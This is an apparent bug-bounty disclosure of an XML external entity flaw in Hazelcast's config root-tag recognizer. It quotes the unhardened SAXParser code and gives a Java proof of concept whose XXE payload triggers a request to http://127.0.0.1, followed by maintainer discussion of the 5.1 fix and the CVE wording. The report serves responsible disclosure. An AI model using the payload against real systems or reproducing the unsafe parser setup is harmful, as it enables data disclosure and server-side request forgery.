Improper Restriction of XML External Entity Reference in hazelcast/hazelcast

Valid

Reported on

Jan 16th 2022

Description

The AbstractXmlConfigRootTagRecognizer() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65

        public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
        this.expectedRootNode = expectedRootNode;
        SAXParserFactory factory = SAXParserFactory.newInstance();
        saxParser = factory.newSAXParser();
    }

    @Override
    public boolean isRecognized(ConfigStream configStream) throws Exception {
        MemberHandler memberHandler = new MemberHandler(expectedRootNode);
        try {
            saxParser.parse(configStream, memberHandler);
        }

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the hazelcast team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Josef Cacek validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Cacek
a year ago

Maintainer

The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407

Josef Cacek
a year ago

Maintainer

Even the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.

Jamie Slome
a year ago

Admin

With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️

Josef Cacek
a year ago

Maintainer

The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.

Jamie Slome
a year ago

Admin

Okay, thanks for the update Josef and that makes sense.

We will confirm the fix for this report once you are ready to publish the report!

Josef Cacek marked this as fixed in 5.1 with commit 4d6b66 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Josef Cacek
a year ago

Maintainer

@jamieslome, how we can change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."

Jamie Slome
a year ago

Admin

@kwart - I have updated the CVE for you 👍

https://github.com/CVEProject/cvelist/pull/5209/files

The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.

Josef Cacek
a year ago

Maintainer

Thanks, Jamie.

to join this conversation